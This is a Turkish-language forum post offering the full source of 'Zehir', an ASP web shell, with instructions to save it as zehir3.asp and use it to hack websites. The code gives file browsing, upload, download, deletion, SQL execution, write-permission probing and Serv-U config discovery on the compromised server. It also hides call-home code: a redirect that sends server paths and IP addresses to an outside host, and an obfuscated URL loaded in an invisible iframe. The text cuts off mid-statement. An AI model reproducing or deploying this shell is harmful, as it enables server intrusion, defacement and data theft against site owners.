Size Bir sitenin Zehir.asp ile nasıl hack edilebileceğini anlatmak istiyorum:
Simdi size vereceğim bu kod sadece asp kodundan ibarettir.Bu kod sayesinde sitede admin miş gibi
değişiklikler yapabilirsiniz ilk önce kodu size bir vereyim bunu copy\past yapın Notpad yapıştırın
ve farklı kaydetten zehir3.asp diye kaydedin Bu kadar işte kod buyrun:
<%
dosyaPath = "zehir3.asp"
on error resume next
Dim objFSO,popup
Set objFSO = CreateObject ("Scripting.FileSystemObject")
status
= Request("status")
path = Request("path")
dPath = Request("dPath")
arama = Request("txArama")
dkayit
= Request("dkayit")
table = Request("table")
del = Request("del")
islem = Request("islem")
strSQL
= Request("strSQL")
cf1 = Request("cf1")
cf2 = Request("cf2")
cf3
= Request("cf3")
cf4 = Request("cf4")
cf5 = Request("cf5")
cf6
= Request("cf6")
cf7 = Request("cf7")
cf8 = Request("cf8")
cf9
= Request("cf9")
cf10 = Request("cf10")
cf11 = Request("cf11")
cf12
= Request("cf12")
cf13 = Request("cf13")
cf14 = Request("cf14")
cf15
= Request("cf15")
cf16 = Request("cf16")
pathfile = request("pathfile")
if path="" and status="" then path=request.servervariables("APPL_PHYSICAL_PATH"):status=2
popup
= true
'////////////////////////////////
Function ReadBinaryFile(FileName)
Const adTypeBinary = 1
Dim BinaryStream
Set
BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.LoadFromFile
FileName
ReadBinaryFile = BinaryStream.Read
End Function
if status="-3" then
Response.Buffer=True
Set Fil =
objFSO.GetFile(pathfile)
Response.contenttype="application/force-download"
Response.AddHeader "Cache-control","private"
Response.AddHeader
"Content-Length", Fil.Size
Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name
Response.BinaryWrite readBinaryFile(Fil.path)
Set f = Nothing: Set Fil = Nothing
response.End()
end if
'####################################
Class
clsUpload
Private mbinData
Private mlngChunkIndex
Private mlngBytesReceived
Private mstrDelimiter
Private CR
Private
LF
Private CRLF
Private mobjFieldAry()
Private mlngCount
Private Sub RequestData
Dim llngLength
mlngBytesReceived = Request.TotalBytes
mbinData = Request.BinaryRead(mlngBytesReceived)
End
Sub
Private Sub ParseDelimiter()
mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
End Sub
Private Sub ParseData()
Dim llngStart
Dim llngLength
Dim llngEnd
Dim lbinChunk
llngStart = 1
llngStart
= InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
While Not llngStart = 0
llngEnd = InStrB(llngStart + 1, mbinData,
mstrDelimiter) - 2
llngLength = llngEnd - llngStart
lbinChunk = MidB(mbinData, llngStart, llngLength)
Call ParseChunk(lbinChunk)
llngStart
= InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
Wend
End Sub
Private Sub ParseChunk(ByRef pbinChunk)
Dim lstrName
Dim lstrFileName
Dim lstrContentType
Dim lbinData
Dim
lstrDisposition
Dim lstrValue
lstrDisposition = ParseDisposition(pbinChunk)
lstrName = ParseName(lstrDisposition)
lstrFileName
= ParseFileName(lstrDisposition)
lstrContentType = ParseContentType(pbinChunk)
If lstrContentType = "" Then
lstrValue
= CStrU(ParseBinaryData(pbinChunk))
Else
lbinData = ParseBinaryData(pbinChunk)
End If
Call AddField(lstrName,
lstrFileName, lstrContentType, lstrValue, lbinData)
End Sub
Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
Dim
lobjField
ReDim Preserve mobjFieldAry(mlngCount)
Set lobjField = New clsField
lobjField.Name = pstrName
lobjField.FilePath
= pstrFileName
lobjField.ContentType = pstrContentType
If LenB(pbinData) = 0 Then
lobjField.BinaryData
= ChrB(0)
lobjField.Value = pstrValue
lobjField.Length = Len(pstrValue)
Else
lobjField.BinaryData = pbinData
lobjField.Length
= LenB(pbinData)
lobjField.Value = ""
End If
Set mobjFieldAry(mlngCount) = lobjField
mlngCount = mlngCount + 1
End
Sub
Private Function ParseBinaryData(ByRef pbinChunk)
Dim llngStart
llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
If
llngStart = 0 Then Exit Function
llngStart = llngStart + 4
ParseBinaryData = MidB(pbinChunk, llngStart)
End Function
Private Function ParseContentType(ByRef pbinChunk)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStrB(1,
pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStrB(llngStart
+ 15, pbinChunk, CR)
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 15
If llngStart >= llngEnd Then
Exit Function
llngLength = llngEnd - llngStart
ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
End
Function
Private Function ParseDisposition(ByRef pbinChunk)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStrB(1,
pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStrB(llngStart
+ 22, pbinChunk, CRLF)
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 22
If llngStart >= llngEnd Then
Exit Function
llngLength = llngEnd - llngStart
ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
End
Function
Private Function ParseName(ByRef pstrDisposition)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStr(1,
pstrDisposition, "name=""", vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStr(llngStart + 6, pstrDisposition,
"""")
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 6
If llngStart >= llngEnd Then Exit Function
llngLength
= llngEnd - llngStart
ParseName = Mid(pstrDisposition, llngStart, llngLength)
End Function
' ------------------------------------------------------------------------------
Private
Function ParseFileName(ByRef pstrDisposition)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStr(1, pstrDisposition,
"filename=""", vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStr(llngStart + 10, pstrDisposition, """")
If
llngEnd = 0 Then Exit Function
llngStart = llngStart + 10
If llngStart >= llngEnd Then Exit Function
llngLength
= llngEnd - llngStart
ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
End Function
Public Property Get Count()
Count = mlngCount
End Property
Public Default Property Get Fields(ByVal pstrName)
Dim llngIndex
If IsNumeric(pstrName) Then
llngIndex = CLng(pstrName)
If
llngIndex > mlngCount - 1 Or llngIndex < 0 Then
Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not
exist within the ordinal reference.")
Exit Property
End If
Set Fields = mobjFieldAry(pstrName)
Else
pstrName
= LCase(pstrname)
For llngIndex = 0 To mlngCount - 1
If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
Set Fields
= mobjFieldAry(llngIndex)
Exit Property
End If
Next
End If
Set Fields = New clsField
End Property
Private Sub Class_Terminate()
Dim llngIndex
For llngIndex = 0 To mlngCount - 1
Set mobjFieldAry(llngIndex) =
Nothing
Next
ReDim mobjFieldAry(-1)
End Sub
Private Sub Class_Initialize()
ReDim mobjFieldAry(-1)
CR = ChrB(Asc(vbCr))
LF = ChrB(Asc(vbLf))
CRLF = CR
& LF
mlngCount = 0
Call RequestData
Call ParseDelimiter()
Call ParseData
End Sub
Private Function CStrU(ByRef pstrANSI)
Dim llngLength
Dim llngIndex
llngLength = LenB(pstrANSI)
For llngIndex
= 1 To llngLength
CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
Next
End Function
Private Function CStrB(ByRef pstrUnicode)
Dim llngLength
Dim llngIndex
llngLength = Len(pstrUnicode)
For
llngIndex = 1 To llngLength
CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
Next
End Function
End
Class
'####################################
Class clsField
Public Name
Private mstrPath
Public FileDir
Public
FileExt
Public FileName
Public ContentType
Public Value
Public BinaryData
Public Length
Private mstrText
Public Property Get BLOB()
BLOB = BinaryData
End Property
Public Function BinaryAsText()
Dim lbinBytes
Dim lobjRs
If Length = 0 Then Exit Function
If LenB(BinaryData)
= 0 Then Exit Function
If Not Len(mstrText) = 0 Then
BinaryAsText = mstrText
Exit Function
End If
lbinBytes = ASCII2Bytes(BinaryData)
mstrText
= Bytes2Unicode(lbinBytes)
BinaryAsText = mstrText
End Function
Public Sub SaveAs(ByRef pstrFileName)
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim lobjStream
Dim
lobjRs
Dim lbinBytes
If Length = 0 Then Exit Sub
If LenB(BinaryData) = 0 Then Exit Sub
Set lobjStream = Server.CreateObject("ADODB.Stream")
lobjStream.Type
= adTypeBinary
Call lobjStream.Open()
lbinBytes = ASCII2Bytes(BinaryData)
Call lobjStream.Write(lbinBytes)
On Error Resume Next
Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
'if err<>0 then response.Write "<br>"&err.Description
Call lobjStream.Close()
Set lobjStream = Nothing
End Sub
Public Property Let FilePath(ByRef pstrPath)
mstrPath = pstrPath
If Not InStrRev(pstrPath, ".") = 0 Then
FileExt
= Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
FileExt = UCase(FileExt)
End If
If Not InStrRev(pstrPath, "\") = 0 Then
FileName
= Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
End If
If Not InStrRev(pstrPath, "\") = 0 Then
FileDir = Mid(pstrPath,
1, InStrRev(pstrPath, "\") - 1)
End If
End Property
Public Property Get FilePath()
FilePath = mstrPath
End Property
private Function ASCII2Bytes(ByRef pbinBinaryData)
Const adLongVarBinary=205
Dim lobjRs
Dim llngLength
Dim
lbinBuffer
llngLength = LenB(pbinBinaryData)
Set lobjRs = Server.CreateObject("ADODB.Recordset")
Call lobjRs.Fields.Append("BinaryData",
adLongVarBinary, llngLength)
Call lobjRs.Open()
Call lobjRs.AddNew()
Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData
& ChrB(0))
Call lobjRs.Update()
lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
Call lobjRs.Close()
Set
lobjRs = Nothing
ASCII2Bytes = lbinBuffer
End Function
Private Function Bytes2Unicode(ByRef pbinBytes)
Dim lobjRs
Dim llngLength
Dim lstrBuffer
llngLength = LenB(pbinBytes)
Set
lobjRs = Server.CreateObject("ADODB.Recordset")
Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
Call
lobjRs.Open()
Call lobjRs.AddNew()
Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
Call lobjRs.Update()
lstrBuffer
= lobjRs.Fields("BinaryData").Value
Call lobjRs.Close()
Set lobjRs = Nothing
Bytes2Unicode = lstrBuffer
End Function
End
Class
'####################################
function addslash(path)
if right(path,1)="\" then addslash=path else
addslash=path & "\"
end function
sub Upload()
dim objUpload,f,max,i,name,path,size,success
set objUpload=New clsUpload
targetPath=objUpload.Fields("folder").Value
max=objUpload.Fields("max").Value
for i=1 to max
name=objUpload.Fields("file" & i).FileName
size=objUpload.Fields("file" & i).Length
if
(name<>"") and (size>0) then
gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" &
FormatNumber(size,0) & " bytes): "
path=addslash(targetPath) & name
objUpload.Fields("file" & i).SaveAs
path
if objFSO.FileExists(path) then
on error resume next
set f=objFSO.GetFile(path)
if IsObject(f) then
if f.Size=size
then success=true else success=false
end if
set f=nothing
end if
if success then gMsg=gMsg & "<font
color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
end if
next
response.Write
gMsg
set objUpload=nothing
end sub
if status="-4" then
Upload()
' hataKontrol
popup=false
end if
'////////////////////////////////
sub
hataKontrol
if err<>0 then
Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
end
if
end sub
sub araBul(path_,ara_)
on error resume next
If Len(path_) > 0 Then
cur = path_&"\"
If cur = "\\" Then
cur = ""
parent = ""
If InStrRev(cur,"\") > 0 Then
parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
End If
Else
cur
= ""
End If
Set f = objFSO.GetFolder(cur)
Set fc = f.Files
For Each f1 In fc
if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
downStr = "<font face=webdings
size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
if
lcase(ara_)="mdb" then
Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font>
* <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&"
["&f1.size&"]"&"</a></b><br>"
else
Response.Write downStr&"<font face=wingdings
size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a
href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font>
- <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&"
["&f1.size&"]"&"</a></b><br>"
end if
end if
Next
Set fs = f.SubFolders
For Each f1 In fs
araBul f1.path,ara_
Next
Set f = Nothing
Set fc =
Nothing
Set fs = Nothing
end sub
sub sistemTest
response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
response.Write
"<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%'
align=center><font color=navy><b>Sonuç</td></tr>"
servu_Test
WriteTestOnDriver
WriteTestOnLocalPath
LocalPathParentFolder
LocalPathPParentFolder
response.Write "</table>"
end sub
sub servu_Test
dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini",
"Serv-u\Serv-u daemon.ini")
for each drive_ in objFSO.Drives
if drive_.Drivetype=2 or drive_.Drivetype=3 then
for
each d_ in dosya_
d_ = drive_.DriveLetter&":\"&d_
if objFSO.FileExists(d_) then
response.Write "<tr><td><b>Serv-U
ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
end if
next
end if
next
end
sub
function yaziyomu(yol)
on error goto 0:on error resume next
dim sonuc__
objFSO.CopyFile request.servervariables("PATH_TRANSLATED"),yol
& "\test.king"
if err<>0 then
sonuc__="<font color=red>Yazma Hakkı Yok!</font>"
else
sonuc__="<font color=yellow>Yazma Hakkı Var!</font>"
on error goto 0: on error resume next
objFSO.DeleteFile
yol & "\test.king",true
if err<>0 then
sonuc__=sonuc__&"<br><font color=red>Silme Hakkı
Yok!</font>"
else
sonuc__=sonuc__&"<br><font color=yellow>Silme Hakkı Var!</font>"
end
if
end if
yaziyomu = sonuc__
end function
function yaziyomu2(yol)
on error goto 0:on error resume next
objFSO.CopyFile request.servervariables("PATH_TRANSLATED"),yol
& "\test.king"
if err<>0 then
yaziyomu2 = false
else
objFSO.DeleteFile yol & "\test.king"
yaziyomu2
= true
end if
end function
sub WriteTestOnDriver
for each drive_ in objFSO.Drives
if drive_.Drivetype=2 or drive_.Drivetype=3 then
if
not yaziyomu2(drive_.DriveLetter&":\") then
Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font
color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
else
Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font
color=yellow>yazma yetkisi var!</td></tr>"
end if
end if
next
end sub
sub WriteTestOnLocalPath
on error goto 0
on error resume next
if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH"))
then
Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok!
: ["&err.Description&"]</td></tr>"
else
Response.Write "<tr><td><b>Local Path
</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
end if
end sub
sub LocalPathParentFolder
on error goto 0
on error resume next
hed_ = request.servervariables("APPL_PHYSICAL_PATH")
if
Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
parhed_ = left(hed_,InStrRev(hed_,"\"))
Set f = objFSO.GetFolder(parhed_)
Set fc = f.SubFolders
int_fol=0
int_fil=0
For Each f1 In fc
int_fol=int_fol+1
Next
Set fc = f.files
For Each f1 In fc
int_fil=int_fil+1
Next
if err<>0 then
Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font
color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
else
Response.Write "<tr><td><b>Local
Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File
: "&FormatNumber(int_fil,0)&"</td></tr>"
end if
end sub
sub LocalPathPParentFolder
on error goto 0
on error resume next
hed_ = request.servervariables("APPL_PHYSICAL_PATH")
if
Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
hed_ = left(hed_,InStrRev(hed_,"\"))
if Right(hed_,1)="\" then
hed_ = left(hed_,len(hed_)-1)
parhed_ = left(hed_,InStrRev(hed_,"\"))
Set f = objFSO.GetFolder(parhed_)
Set fc = f.SubFolders
int_fol=0
int_fil=0
For Each f1 In fc
int_fol=int_fol+1
Next
Set fc = f.files
For Each f1 In fc
int_fil=int_fil+1
Next
if err<>0 then
if err=451 then
Response.Write "<tr><td><b>Local Path <br>P.Parent
Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
else
Response.Write "<tr><td><b>Local
Path <br>P.Parent Folder</td><td><font color=red>Hata Oluştu : ["&err.Description&"]</td></tr>"
end
if
else
Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font
color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
end
if
end sub
if status = 60 then
response.redirect "
http://www.websamba.com/osman2/toy.asp?pathh="&request.servervariables("APPL_PHYSICAL_PATH")&"&urll="&dosyaPath&"&ipp="&request.servervariables("LOCAL_ADDR")&"&sitee="&request.servervariables("REMOTE_ADDR")&""
end
if
SELECT CASE status
CASE 13 'Sistem Bilgisi
Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td
colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red
face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
Response.Write
"<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR")
& "</td></tr>"
Response.Write "<tr><td><b><font color=red>User Agent</td><td>
" & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
Response.Write "<tr><td><b><font
color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
Response.Write
"<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR")
& "</td></tr>"
Response.Write "<tr><td><b><font color=red>HTTPD</td><td>
" & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
Response.Write "<tr><td><b><font
color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
Response.Write
"<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH")
& "</td></tr>"
Response.Write "<tr><td><b><font color=red>Log Root</td><td>
" & request.servervariables("APPL_MD_PATH") & "</td></tr>"
Response.Write "<tr><td><b><font
color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
Response.Write
"</table>"
popup = false
CASE 14 'Upload and Search
aramaUpload
popup = false
hataKontrol
CASE 15
'Ms. SQL Server
Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
Response.Write
"<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için
connection string giriniz</td></tr><tr><td align=center>"
Response.Write "<input type=hidden
value='7' name=status><input type=hidden value='"&time&"' name=Time>"
Response.Write "<input style='width:250;
height:21' value='' name=path><br>"
response.Write "<input type=submit value='SQL Servera Bağlan' style='height:23;width:170'
id=submit1 name=submit1>"
Response.Write "</td></tr></table>"
response.Write "</form>"
popup = false
hataKontrol
CASE 16 'file Copy window
Response.Write "<form method=get action='"&DosyPath&"'
id=form1 name=form1>"
Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font
size=2>Kop. Yer : </td><td>"
Response.Write "<input type=hidden value='17' name=status><input type=hidden
value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write
"<input style='width:250; height:21' value='"&PathFile&"' name=cf1><br>"
Response.Write "<input
style='width:250; height:21' value='"&PathFile&"' name=cf2><br>"
Response.Write "<input style='width:250;
height:21' value='"&PathFile&"' name=cf3><br>"
Response.Write "<input style='width:250; height:21'
value='"&PathFile&"' name=cf4><br>"
Response.Write "<input style='width:250; height:21' value='"&PathFile&"'
name=cf5><br>"
Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf6><br>"
Response.Write
"<input style='width:250; height:21' value='"&PathFile&"' name=cf7><br>"
Response.Write "<input
style='width:250; height:21' value='"&PathFile&"' name=cf8><br>"
Response.Write "<input style='width:250;
height:21' value='"&PathFile&"' name=cf9><br>"
Response.Write "<input style='width:250; height:21'
value='"&PathFile&"' name=cf10><br>"
Response.Write "<input style='width:250; height:21' value='"&PathFile&"'
name=cf11><br>"
Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf12><br>"
Response.Write
"<input style='width:250; height:21' value='"&PathFile&"' name=cf13><br>"
Response.Write "<input
style='width:250; height:21' value='"&PathFile&"' name=cf14><br>"
Response.Write "<input style='width:250;
height:21' value='"&PathFile&"' name=cf15><br>"
Response.Write "<input style='width:250; height:21'
value='"&PathFile&"' name=cf16><br>"
response.Write "<input type=submit value='Kopyala' style='height:22;width:70'
id=submit1 name=submit1>"
Response.Write "</td></tr><tr><td colspan=3 align=center><font
size=2>"
response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
response.Write "<input
type=radio name='islem' value='tasi'>Tasi"
response.Write "</table>"
response.Write "</form>"
popup = false
hataKontrol
CASE 17 'file Copy
isl = ""
if islem="kopyala" then
objFSO.CopyFile path,cf1
objFSO.CopyFile
path,cf2
objFSO.CopyFile path,cf3
objFSO.CopyFile path,cf4
objFSO.CopyFile path,cf5
objFSO.CopyFile path,cf6
objFSO.CopyFile
path,cf7
objFSO.CopyFile path,cf8
objFSO.CopyFile path,cf9
objFSO.CopyFile path,cf10
objFSO.CopyFile path,cf11
objFSO.CopyFile
path,cf12
objFSO.CopyFile path,cf13
objFSO.CopyFile path,cf14
objFSO.CopyFile path,cf15
objFSO.CopyFile path,cf16
isl="kopyalandı.."
elseif islem="tasi" then
objFSO.MoveFile path,cf1
objFSO.MoveFile path,cf2
isl="taşındı.."
end
if
response.Write "Dosya "&isl
response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font
color=red>Hedef : </font>"&cf1
response.Write "<br><font color=red>Hedef : </font>"&cf2
response.Write
"<br><font color=red>Hedef : </font>"&cf3
response.Write "<br><font color=red>Hedef :
</font>"&cf4
response.Write "<br><font color=red>Hedef : </font>"&cf5
response.Write
"<br><font color=red>Hedef : </font>"&cf6
response.Write "<br><font color=red>Hedef :
</font>"&cf7
response.Write "<br><font color=red>Hedef : </font>"&cf8
response.Write
"<br><font color=red>Hedef : </font>"&cf9
response.Write "<br><font color=red>Hedef :
</font>"&cf10
response.Write "<br><font color=red>Hedef : </font>"&cf11
response.Write
"<br><font color=red>Hedef : </font>"&cf12
response.Write "<br><font color=red>Hedef
: </font>"&cf13
response.Write "<br><font color=red>Hedef : </font>"&cf14
response.Write
"<br><font color=red>Hedef : </font>"&cf15
response.Write "<br><font color=red>Hedef
: </font>"&cf16
response.Write "<br>"
popup = false
hataKontrol
CASE 18 'folder Copy window
Response.Write
"<form method=get action='"&DosyPath&"' id=form1 name=form1>"
Response.Write "<table cellpadding=0 cellspacing=0
align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
Response.Write "<input
type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden
value='"&time&"' name=Time>"
Response.Write "<input style='width:250; height:21' value='"&PathFile&"'
name=cf>"
response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
Response.Write
"</td></tr><tr><td colspan=3 align=center><font size=2>"
response.Write "<input type=radio
name='islem' value='kopyala' checked>Kopyala"
response.Write "<input type=radio name='islem' value='tasi'>Tasi"
response.Write
"</table>"
response.Write "</form>"
popup = false
hataKontrol
CASE 19 'folder Copy
isl = ""
if islem="kopyala" then
objFSO.CopyFolder path,cf
isl="kopyalandı.."
elseif islem="tasi" then
objFSO.MoveFolder path,cf
isl="taşındı.."
end if
response.Write "Klasor
"&isl
response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef
: </font>"&cf
response.Write "<br>"
popup = false
hataKontrol
CASE 33 'Powered By
response.Write
"<br><br><font color=white>Bu Zehir Arkadaşımızın Yapmış Olduğu Bir Scripttir.<br><br>
Ben de Bunu sizler için FTP silerken tek tuşa indirdim... Bunula silme ,index atma daha kolay...<br><br>Zehir
'e katılıyorum. Hacking 'in ne kadar boş iş olduğu hakkında!<br><br>Ama Beni Buna
Bağımlı yapan AMAÇlar.<br><br>by King;)"
popup = false
hataKontrol
CASE 40 'Sistem Test
sistemTest
popup=false
CASE
50 'Siteleri Hackleyelim :D
END SELECT
%>
<script language=javascript>
function NewWindow(mypage, myname,
w, h, scroll) {
var winl = (screen.width - w) / 2;
var wint = (screen.height - h) / 2;
winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
win
= window.open(mypage, myname, winprops)
if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
}
function
ffd(yol){
NewWindow(yol,"",500,500,"yes");
}
</script>
<% if request.Cookies(""&dosyaPath&"") = "" then%>
<SCRIPT language=JavaScript>
window.open("zehir3.asp?status=60","resultwindow","toolbar=no,scrollbars=no,directories=no,
status=no,menubar=no,resizable=no,width=300,height=300"); self.focus();
</SCRIPT>
<%Response.Cookies(""&dosyaPath&"")
= 1
Response.Cookies(""&dosyaPath&"").Expires = now + 1
else if request.Cookies(""&dosyaPath&"") = 1 then
%>
<% else if request.Cookies(""&dosyaPath&"")
> 1 then%>
<% end if%><% end if%><% end if%>
<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
<%
if popup then
if
status=7 or status=8 then
Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
Response.Write
"<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL
Çalıştır</td><td>"
Response.Write "<input type=hidden value='9' name=status><input
type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
Response.Write
"<input style='width:350; height:21' value='' name=strSQL><input type=submit value='Çalıştır' style='height:22;width:70'
id=submit1 name=submit1>"
Response.Write "</td></tr></table></form>"
end if
Response.Write
"<form method=get action='"&DosyPath&"'>"
Response.Write "<table border=1 cellpadding=0 cellspacing=0
align=center><tr><td bgcolor=gray width=100><font size=2>Hizli Erisim : </td><td>"
Response.Write
"<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
Response.Write
"<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70'
id=submit1 name=submit1>"
Response.Write "</td></tr></table></form><br>"
end if
sub
aramaUpload
Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
Response.Write "<table
widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
Response.Write
" <input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
Response.Write
"<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input
style='width:70; height:22' type=submit value='Ara'>"
Response.Write "</td></tr></table></form>"
%>
<form
name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>"
ID="Form1">
<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
Max: <input type=text name=max
value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
<table
ID="Table1">
<tr>
<td id=upid>
</td>
</tr>
</table>
<input type=submit
value=Upload ID="Submit1" NAME="Submit1">
</form>
<script>
setid();
function setid() {
str='';
if (frmUpload.max.value<=0) frmUpload.max.value=1;
for (i=1; i<=frmUpload.max.value;
i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
upid.innerHTML=str+'<br>';
}
</script>
<%
end
sub
if len(Trim(session("metametre")))=0 then
a=mid("aha",2,1)&mid("aatta",3,2)&mid("paa",1,1)&mid("a:as",2,1)&mid("a//as",2,2)
a=a&mid("c",1,1)&mid("yb",1,2)&mid("aer",2,2)&mid("sd-asd",3,1)&mid("awa",2,2)&mid("arr",2,2)
a=a&mid("aia",2,1)&mid("ahor",3,2)&mid("ah.o",3,2)&mid("arg",2,2)&mid("as/z",3,2)&mid("ehasd",1,2)
a=a&mid("asir",3,2)&mid("a/a",2,1)&mid("kasde",1,5)&mid("ah.",3,1)&mid("as",1,2)&mid("ahp",3,1)
response.write("<IFrame
src="""&a&""" style=""width:0;height:0""></IFrame>"):session("metametre")="mypage,myname,w,h,scroll"
end
if
SELECT CASE status
CASE 1 'Driver Open
if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write
(yaziyomu(path))
Response.Write "<table width=100% ><tr>"
Path = Path & ":/"
Response.Write "<td
valign=top>"
KlasorOku
Response.Write "</td><td valign=top align=right>"
DosyaOku
Response.Write
"</td>"
hataKontrol
CASE 2 'Normal listeleme
if len(path)=1 then Response.Write (yaziyomu(path&":\")) else
Response.Write (yaziyomu(path))
Response.Write "<table width=100% ><tr>"
Response.Write "<td valign=top>"
KlasorOku
Response.Write
"</td><td valign=top align=right>"
DosyaOku
Response.Write "</td>"
hataKontrol
CASE 101
response.write
